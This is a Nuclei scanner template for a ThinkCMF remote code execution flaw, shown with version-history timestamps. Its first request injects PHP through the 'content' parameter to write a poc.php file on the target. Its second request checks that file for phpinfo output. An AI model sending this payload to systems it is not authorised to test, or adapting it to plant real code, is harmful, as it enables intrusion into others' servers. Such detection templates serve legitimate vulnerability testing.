nuclei-templates/vulnerabilities/thinkcmf/thinkcmf-rce.yaml

29 lines
585 B
YAML
Raw Normal View History

id: thinkcmf-rce
2021-02-11 17:31:25 +00:00
info:
name: ThinkCMF RCE
2021-02-11 17:31:25 +00:00
author: pikpikcu
severity: critical
reference: https://www.freebuf.com/vuls/217586.html
tags: thinkcmf,rce
2021-02-11 17:31:25 +00:00
requests:
- method: GET
path:
2021-02-11 20:33:38 +00:00
- "{{BaseURL}}/index.php?a=fetch&content=%3C?php+file_put_contents(%22poc.php%22,%22%3C?php+echo+phpinfo()%3B%22)%3B"
2021-02-11 17:31:25 +00:00
- method: GET
path:
- "{{BaseURL}}/poc.php"
matchers-condition: and
matchers:
- type: word
words:
2021-02-11 20:33:38 +00:00
- "PHP Extension"
- "PHP Version"
condition: and
2021-02-11 17:31:25 +00:00
- type: status
status:
- 200